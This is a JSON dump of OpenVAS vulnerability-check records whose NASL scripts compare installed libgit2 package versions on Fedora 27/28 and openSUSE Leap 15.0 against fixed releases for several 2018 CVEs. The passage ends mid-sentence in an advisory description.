libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native-speed custom Git applications in any language with bindings.
{"openvas": [{"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-3e021c6c2e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874915", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3e021c6c2e_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-3e021c6c2e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874915\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-10 06:22:30 +0200 (Fri, 10 Aug 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-3e021c6c2e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3e021c6c2e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAFODB7GRTYS4SCIO2GNYOE4NAC7AE3P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.6~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-19T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-ca483ae3e0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_ca483ae3e0_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-ca483ae3e0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874968\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-19 06:50:29 +0200 (Sun, 19 Aug 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-ca483ae3e0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-ca483ae3e0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CM5WCC5TEFHVNXMJDTRRAD6VFTJLCDA4\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.6~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-4d253dc945", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_4d253dc945_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-4d253dc945\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874827\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:04 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-4d253dc945\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-4d253dc945\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-fb071377ba", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_fb071377ba_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-fb071377ba\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874830\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 06:06:27 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-fb071377ba\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fb071377ba\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-11-12T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-f6c972fc06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_f6c972fc06_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-f6c972fc06\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875251\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:20:22 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-f6c972fc06\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-f6c972fc06\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RWUYSQIRNA7BF3QIFK765ETPFQ6URXAE\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the FEDORA-2018-f6c972fc06 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-11-12T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-3448c8aec1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875257", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3448c8aec1_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-3448c8aec1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875257\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-12 06:21:19 +0100 (Mon, 12 Nov 2018)\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-3448c8aec1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3448c8aec1\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WDTYHGBY3SFDXNHSJNH54FQEMJJLUZOI\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the FEDORA-2018-3448c8aec1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-42eab0f5b9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875204", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875204", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_42eab0f5b9_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-42eab0f5b9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875204\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 06:44:35 +0200 (Wed, 17 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-42eab0f5b9\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-42eab0f5b9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PKRWJ6IUL2V32F67UNPFRHEF5LEVL2IZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.7~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:2502-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852094", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852094\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:47:24 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:2502-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2502-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00074.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:2502-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 to version 0.26.5 fixes the following issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out\n of bound read, allowing to read the base object, which could be\n exploited by an 
